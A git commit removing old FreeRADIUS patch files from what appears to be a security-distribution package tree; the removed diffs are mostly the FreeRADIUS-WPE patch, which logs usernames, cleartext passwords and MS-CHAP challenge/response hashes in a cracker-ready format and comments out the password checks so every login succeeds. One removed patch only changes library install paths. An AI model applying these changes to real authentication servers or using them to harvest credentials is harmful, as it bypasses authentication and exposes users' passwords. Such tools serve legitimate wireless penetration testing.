freeradius: remove old/unused

Rick Farina (Zero_Chaos) 2019-10-14 13:23:58 -04:00
parent b41931b67f
commit 1ee23dced3
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
8 changed files with 0 additions and 1197 deletions


@ -1,376 +0,0 @@
diff -uNr freeradius-server-2.1.12/raddb/radiusd.conf.in freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in
--- freeradius-server-2.1.12/raddb/radiusd.conf.in 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/radiusd.conf.in 2012-08-15 10:34:20.369565898 -0400
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.12/raddb/users freeradius-server-2.1.12-wpe/raddb/users
--- freeradius-server-2.1.12/raddb/users 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/raddb/users 2012-08-15 10:34:20.369565898 -0400
@@ -201,3 +201,6 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -uNr freeradius-server-2.1.12/src/include/radiusd.h freeradius-server-2.1.12-wpe/src/include/radiusd.h
--- freeradius-server-2.1.12/src/include/radiusd.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/include/radiusd.h 2012-08-15 10:34:20.369565898 -0400
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.12/src/main/auth.c freeradius-server-2.1.12-wpe/src/main/auth.c
--- freeradius-server-2.1.12/src/main/auth.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/auth.c 2012-08-15 10:34:20.369565898 -0400
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.12/src/main/log.c freeradius-server-2.1.12-wpe/src/main/log.c
--- freeradius-server-2.1.12/src/main/log.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/log.c 2012-08-15 10:34:20.369565898 -0400
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,68 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.12/src/main/mainconfig.c freeradius-server-2.1.12-wpe/src/main/mainconfig.c
--- freeradius-server-2.1.12/src/main/mainconfig.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/mainconfig.c 2012-08-15 10:34:20.369565898 -0400
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.12/src/main/radiusd.c freeradius-server-2.1.12-wpe/src/main/radiusd.c
--- freeradius-server-2.1.12/src/main/radiusd.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/main/radiusd.c 2012-08-15 10:35:10.881816378 -0400
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION ", for host " HOSTINFO ", built on " __DATE__ " at " __TIME__;
pid_t radius_pid;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2012-08-15 10:34:20.369565898 -0400
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2012-08-15 10:34:20.369565898 -0400
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.1.12/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2012-08-15 10:34:20.369565898 -0400
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
+ /* WPE FTW
if (memcmp(output, packet->value, 16) != 0) {
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -uNr freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.12/src/modules/rlm_mschap/rlm_mschap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_mschap/rlm_mschap.c 2012-08-15 10:34:20.381565941 -0400
@@ -661,9 +661,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -678,9 +680,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE FTW
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1130,7 +1134,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1239,7 +1243,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, request->username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -uNr freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.1.12/src/modules/rlm_pap/rlm_pap.c 2011-09-30 10:12:07.000000000 -0400
+++ freeradius-server-2.1.12-wpe/src/modules/rlm_pap/rlm_pap.c 2012-08-15 10:34:20.381565941 -0400
@@ -521,6 +521,8 @@
RDEBUG("ERROR: You set 'Auth-Type = PAP' for a request that does not contain a User-Password attribute!");
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
/*
* The user MUST supply a non-zero-length password.
@@ -604,6 +606,7 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE FTW
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +614,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +647,12 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +676,12 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +700,12 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SHA1 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -716,10 +726,12 @@
request->password->length);
fr_SHA1Update(&sha1_context, &vp->vp_octets[20], vp->length - 20);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE FTW
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SSHA password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -741,11 +753,13 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: NT password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -765,16 +779,20 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: mschap xlat failed");
goto make_msg;
}
+ /* WPE FTW
if ((fr_hex2bin(digest, digest, 16) != vp->length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0)) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: LM password check failed");
+ */
make_msg:
+ /*
RDEBUG("Passwords don't match");
module_fmsg_vp = pairmake("Module-Failure-Message",
module_fmsg, T_OP_EQ);
pairadd(&request->packet->vps, module_fmsg_vp);
return RLM_MODULE_REJECT;
}
+ */
goto done;
break;


@ -1,104 +0,0 @@
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
--- a/src/modules/Makefile
+++ b/src/modules/Makefile
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
--- a/src/modules/rules.mak
+++ b/src/modules/rules.mak
@@ -122,7 +122,7 @@
$(TARGET).la: $(RLM_SUBDIRS) $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -163,13 +163,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/modules/rlm_sql/drivers/rules.mak
+++ b/src/modules/rlm_sql/drivers/rules.mak
@@ -103,7 +103,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION_STRING) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_SQL_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(RLM_SQL_LIBS)
+ -rpath $(pkglibdir) $^ $(RLM_SQL_LIBS)
#######################################################################
#
@@ -141,12 +141,10 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION_STRING).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi
--- a/src/lib/Makefile
+++ b/src/lib/Makefile
@@ -42,7 +42,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link --tag=CC $(CC) -release $(RADIUSD_VERSION) \
- $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^
+ $(LDFLAGS) $(LINK_MODE) -o $@ -rpath $(libdir) $^ $(LIBS)
$(LT_OBJS): $(INCLUDES)
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
--- a/Make.inc.in
+++ b/Make.inc.in
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@


@ -1,374 +0,0 @@
File ./freeradius-2.2.5.orig/.ipc_in is a fifo while file ./freeradius-2.2.5/.ipc_in is a fifo
File ./freeradius-2.2.5.orig/.ipc_out is a fifo while file ./freeradius-2.2.5/.ipc_out is a fifo
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/radiusd.conf.in 2014-05-18 20:13:04.234827890 +0800
@@ -499,6 +499,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/raddb/users 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/raddb/users 2014-05-18 20:16:52.153826780 +0800
@@ -201,3 +201,7 @@
# Service-Type = Administrative-User
# On no match, the user is denied access.
+
+#"bradtest" Cleartext-Password := "bradtest", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:11:13.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/include/radiusd.h 2014-05-18 20:17:59.921826451 +0800
@@ -369,6 +369,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/auth.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/auth.c 2014-05-18 20:19:11.561826102 +0800
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/log.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/log.c 2014-05-18 20:23:55.063824722 +0800
@@ -27,6 +27,8 @@
RCSID("$Id: ed6baf3e2c7a6e92f49de7335bb9747aea2e7ca2 $")
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
@@ -191,6 +193,64 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+}
/*
* Dump a whole list of attributes to DEBUG2
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/mainconfig.c 2014-05-18 20:24:49.415824458 +0800
@@ -250,6 +250,8 @@
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
+
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/main/radiusd.c 2014-05-18 20:25:46.103824182 +0800
@@ -65,7 +65,7 @@
int debug_flag = 0;
int check_config = FALSE;
-const char *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+const char *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" RADIUSD_VERSION_COMMIT ")"
#endif
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2014-05-18 20:27:16.391823742 +0800
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2014-05-18 20:27:16.391823742 +0800
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-04-29 03:13:08.000000000 +0800
+++ ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2014-05-18 20:27:16.392823742 +0800
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -urN ./freeradius-2.2.5.orig/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c ./freeradius-2.2.5/work/freeradius-server-2.2.5/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
